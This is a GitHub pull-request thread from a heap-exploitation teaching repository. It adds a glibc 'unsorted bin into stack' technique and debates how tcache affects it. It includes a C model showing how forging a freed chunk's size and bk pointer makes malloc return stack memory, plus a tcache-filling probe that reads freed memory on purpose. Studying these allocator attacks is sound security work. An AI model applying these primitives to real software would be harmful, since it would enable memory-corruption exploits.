Add unsorted_bin_into_stack #77

Merged: 1 commit, Jun 5, 2018

Conversation

insuyun (Contributor) commented May 8, 2018

It adds another attack that returns a nearly arbitrary pointer.
It is similar to house of lore, but it overwrites the unsorted bin and is simpler.
I tested it with Ubuntu 16.04.
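
As an added illustration for this thread (it is neither the PR's own unsorted_bin_into_stack.c nor glibc source), the C model below re-implements just enough of glibc's unsorted-bin scan to show the mechanism: the malloc_chunk layout, the circular bin list, the size-range check, the unlink write that a forged bk turns into "next victim is my stack buffer", and, for contrast, the list-consistency check that glibc 2.29 later added to that scan. The arena struct, the static heap buffer, the 0x110 request size and the function names are assumptions of the model, not glibc's data structures.

```c
/* Model of the unsorted_bin_into_stack mechanism: added example for this
 * thread, not glibc code and not the PR's PoC. Chunk layout and bin list follow
 * glibc's malloc_chunk; the arena, heap buffer and sizes are assumed. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SIZE_SZ    sizeof(size_t)
#define PREV_INUSE 1UL
#define SIZE_BITS  7UL

struct chunk {               /* glibc malloc_chunk: header words, then fd/bk */
    size_t        prev_size;
    size_t        size;      /* chunk size | flag bits */
    struct chunk *fd;
    struct chunk *bk;
};
#define chunksize(p) ((p)->size & ~SIZE_BITS)
#define chunk2mem(p) ((void *)((char *)(p) + 2 * SIZE_SZ))

struct arena {               /* assumed stand-in for main_arena */
    struct chunk unsorted;   /* unsorted bin head; only fd/bk are used */
    size_t       system_mem; /* bound used by the size sanity check */
};

/* free() of a non-fastbin, non-tcache chunk that does not border top. */
static void unsorted_insert(struct arena *av, struct chunk *p)
{
    struct chunk *head = &av->unsorted;
    p->fd = head->fd;
    p->bk = head;
    head->fd->bk = p;
    head->fd = p;
}

/* _int_malloc's unsorted-bin scan, cut down to what the attack needs.
 * hardened == 0: size-range check only (glibc <= 2.28).
 * hardened == 1: also the "unsorted double linked list corrupted" check added
 *   in glibc 2.29; its other 2.29 checks (next chunk size/prev_size) are not
 *   modelled, so this shows which field the PoC layout fails, not that newer
 *   glibc is immune. Non-fitting chunks are unlinked and dropped here (glibc
 *   sorts them into a bin). Returns NULL where glibc would abort. */
static void *unsorted_malloc(struct arena *av, size_t nb, int hardened)
{
    struct chunk *head = &av->unsorted, *victim;
    while ((victim = head->bk) != head) {
        struct chunk *bck = victim->bk;   /* attacker-controlled after the overwrite */
        size_t size = chunksize(victim);
        if (size <= 2 * SIZE_SZ || size > av->system_mem) {
            fprintf(stderr, "malloc(): invalid size (unsorted)\n");
            return NULL;
        }
        if (hardened && (bck->fd != victim || victim->fd != head)) {
            fprintf(stderr, "malloc(): unsorted double linked list corrupted\n");
            return NULL;
        }
        /* unlink: with a forged bk this writes the bin head into bck->fd and
         * makes bck, the stack chunk, the next victim */
        head->bk = bck;
        bck->fd = head;
        if (size == nb) {
            victim->fd = victim->bk = NULL;
            return chunk2mem(victim);
        }
    }
    return NULL;
}

/* A freed chunk sits in the unsorted bin; a bug lets the attacker overwrite its
 * size and bk. Returns 1 if the next malloc handed out the fake chunk on the
 * stack, 0 if the model aborted, -1 otherwise. */
static int run_attack(int hardened)
{
    static size_t heap[0x80];            /* stand-in for heap memory */
    size_t stack_fake[4] = {0};          /* the fake chunk lives on the stack */
    struct chunk *fake = (struct chunk *)stack_fake;
    struct chunk *victim = (struct chunk *)heap;
    const size_t nb = 0x110;             /* chunk size of malloc(0x100) on x86-64 */
    struct arena av = { .system_mem = sizeof heap };

    av.unsorted.fd = av.unsorted.bk = &av.unsorted;
    memset(heap, 0, sizeof heap);
    victim->size = nb | PREV_INUSE;
    unsorted_insert(&av, victim);        /* free(victim) */

    /* attacker-prepared fake chunk: size equals the next request and passes
     * the range check; fd/bk only need to be readable and writable */
    fake->size = nb | PREV_INUSE;
    fake->fd = fake->bk = fake;

    /* the vulnerability: size changed so victim is no longer an exact fit but
     * still passes the range check, bk redirected to the stack */
    victim->size = 0x20 | PREV_INUSE;
    victim->bk = fake;

    void *p = unsorted_malloc(&av, nb, hardened);
    return p == NULL ? 0 : (p == chunk2mem(fake) ? 1 : -1);
}

int main(void)
{
    printf("glibc <= 2.28 model: %s\n", run_attack(0) == 1 ? "malloc returns the stack chunk" : "attack failed");
    printf("glibc 2.29 list check model: %s\n", run_attack(1) == 0 ? "aborted" : "not stopped");
    return 0;
}
```

The two writes in the scenario are the whole primitive: the size is changed so the victim is skipped instead of returned, and bk is pointed at memory the attacker controls; the scan's own unlink then hands that memory out on the next exact-fit request, which is why the fake chunk only needs a plausible size word.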

m1ghtym0 (Member) commented

This attack does not work on the latest glibc anymore, because the freed chunk will not end up in the unsorted bin, but in the tcache instead. When reallocated, the size of the chunk in the tcache will not be checked again, so the modification is irrelevant (in this step).
Of course the tcache basically reduces security checks here, but in this case it destroys this particular attack vector.

@zardus We should think about a structure in this repo that differentiates attacks based on the glibc version. Or even hierarchical for different libcs like: libc -> version -> attack

insuyun (Contributor, author) commented May 15, 2018

True, this does not work in the latest glibc.
But that does not prevent the attack; it is due to the change of its data structure.
Currently, most techniques in how2heap are tested on Ubuntu 14.04 or 16.04.
This attack also works on those versions, so I think it's fine to add it.

Also, I agree that it's better to maintain this by glibc version.
For example, the current house of orange is broken due to the glibc patch.
Also, we can do the other attacks related to tcache, as you mentioned.

zardus (Member) commented May 16, 2018

I like the idea of splitting things up by libc version (and libc variant), especially with what's coming soon.

bennofs (Contributor) commented May 26, 2018

You should still be able to make this attack work by filling up the tcache first, since once the tcache is full, chunks still go into the unsorted bin. In fact, I think any attack that works without tcache can work with tcache, but you may need to do a lot of mallocs/frees in between to fill/clear the tcache.
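
For the two tcache points made above (the freed chunk landing in tcache, where its size is not looked at again on reallocation, and filling the tcache so that the next free reaches the unsorted bin), here is an added probe written for this thread; it is not code from the PR or from how2heap. It assumes glibc 2.26 or later on x86-64 with the default tcache count of 7, a 0x100 request (chunk size 0x110, above the fastbin range and inside the tcache range), and a build without sanitizers, because it reads freed memory on purpose. The struct, field names and the `passed` bitmask are the probe's own.

```c
/* Added probe for this thread (not from the PR or how2heap): on the running
 * glibc, check that the 8th free() of a same-size chunk skips the full tcache
 * bin (7 entries by default) and lands in the unsorted bin, and that the next
 * malloc() of that size is served from tcache without touching that chunk.
 * Assumes glibc >= 2.26, x86-64, default tunables, no ASan (deliberate UAF reads).
 * Build: cc -O0 -o tcache_fill tcache_fill.c */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define NCHUNKS 8      /* tcache holds 7 per size class; the 8th overflows it */
#define REQ     0x100  /* chunk size 0x110: above fastbin range, inside tcache range */

struct probe {
    uintptr_t first_fd, first_bk;  /* first two words of the 1st freed chunk (tcache) */
    uintptr_t last_fd, last_bk;    /* first two words of the 8th freed chunk (unsorted) */
    int reuse_from_tcache;         /* 1 if malloc(REQ) returned the tcache head */
    int passed;                    /* bitmask of the three checks below */
};

/* fd/bk (or tcache next/key) of a freed chunk are the first two user-data words */
static uintptr_t word(void *p, int i) { return ((uintptr_t *)p)[i]; }

static struct probe tcache_fill_probe(void)
{
    struct probe r = {0};
    void *chunks[NCHUNKS];

    for (int i = 0; i < NCHUNKS; i++)
        chunks[i] = malloc(REQ);
    void *guard = malloc(REQ);      /* keeps the 8th chunk from merging into top */

    for (int i = 0; i < NCHUNKS; i++)
        free(chunks[i]);            /* chunks 0..6 -> tcache, chunk 7 -> unsorted bin */

    /* Deliberate use-after-free reads of allocator metadata. */
    r.first_fd = word(chunks[0], 0);
    r.first_bk = word(chunks[0], 1);
    r.last_fd  = word(chunks[NCHUNKS - 1], 0);
    r.last_bk  = word(chunks[NCHUNKS - 1], 1);

    /* tcache is LIFO: the most recently cached entry (chunks[6]) comes back
     * first; the unsorted chunk (chunks[7]) is never inspected on this path. */
    void *again = malloc(REQ);
    r.reuse_from_tcache = (again == chunks[NCHUNKS - 2]);

    /* A lone chunk in the unsorted bin has fd == bk == the bin head inside
     * main_arena; a tcache entry's first word is NULL or a mangled next
     * pointer, never that head. */
    if (r.last_fd != 0 && r.last_fd == r.last_bk) r.passed |= 1;
    if (r.first_fd != r.last_fd)                   r.passed |= 2;
    if (r.reuse_from_tcache)                       r.passed |= 4;

    free(again);
    free(guard);
    return r;
}

int main(void)
{
    struct probe r = tcache_fill_probe();
    printf("chunks[0] (tcache):   fd=%#lx bk=%#lx\n", (unsigned long)r.first_fd, (unsigned long)r.first_bk);
    printf("chunks[7] (unsorted): fd=%#lx bk=%#lx\n", (unsigned long)r.last_fd, (unsigned long)r.last_bk);
    printf("malloc(%#x) served from tcache head: %d\n", REQ, r.reuse_from_tcache);
    printf("checks passed: %d of 3\n", (r.passed & 1) + ((r.passed >> 1) & 1) + ((r.passed >> 2) & 1));
    return r.passed == 7 ? 0 : 1;
}
```

Seven frees of one size class fill the tcache bin, and the eighth falls through to _int_free and the unsorted bin, which is where the overwrite of size and bk from this PR applies. The malloc at the end shows the other half of the discussion: it returns the tcache head without reading the unsorted chunk at all, so a modified size on a chunk that sits in tcache changes nothing on that path.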

insuyun (Contributor, author) commented May 26, 2018

If we have tcache, I think we can use tcache_poisoning instead of this one.

m1ghtym0 (Member) commented May 27, 2018 via email

m1ghtym0 merged commit 82d7434 into shellphish:master Jun 5, 2018

insuyun (Contributor, author) commented Jun 5, 2018

Thanks. Maybe we need to maintain these techniques based on version.

m1ghtym0 (Member) commented Jun 5, 2018

Thank you!
I'm going to build something this weekend.
